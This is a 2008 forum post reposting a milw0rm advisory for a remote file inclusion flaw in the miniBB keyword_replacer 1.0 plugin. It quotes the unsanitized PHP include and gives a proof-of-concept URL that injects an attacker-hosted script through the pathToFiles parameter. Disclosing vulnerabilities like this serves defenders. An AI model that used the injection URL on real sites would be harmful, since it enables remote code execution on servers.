Guest Nemessis Posted April 26, 2008 Report Posted April 26, 2008 http://www.milw0rm.com/exploits/2528---------------------------------------------------------------------------miniBB keyword_replacer <= 1.0 [pathToFiles] Remote File Include Vulnerability---------------------------------------------------------------------------Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://rstcenter.com :Remote : YesCritical Level : Dangerous---------------------------------------------------------------------------Affected software description :~~~~~~~~~~~~~~~~~~~~~~~~~~Application : miniBB keyword_replacerversion : 1.0URL : http://www.minibb.net/forums/storage/mods/minibb_plugin_keyword_replacer.zip------------------------------------------------------------------Vurnerable CoDE:~~~~~~~~~~~~~~~~~~~~~~~~~~if(!isset($pathToFiles)) include('./setup_options.php');include($pathToFiles.'/keywords/keywords.php');Exploit:~~~~Variable $pathToFiles not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.# http://www.site.com/[path]/addon_keywordreplacer.php?pathToFiles=[Evil_Script]---------------------------------------------------------------------------Shoutz:~~# Greetz to [Oo], str0ke, th0r, RST TEAM: [ !_30, darkking, DarkWizzard, Elias, Icarius, MiniDisc, Nemessis, Shocker, SpiridusuCaddy and sysghost !]# To all members of #h4cky0u and RST [ hTTp://rstcenter.com ]---------------------------------------------------------------------------*/ Quote
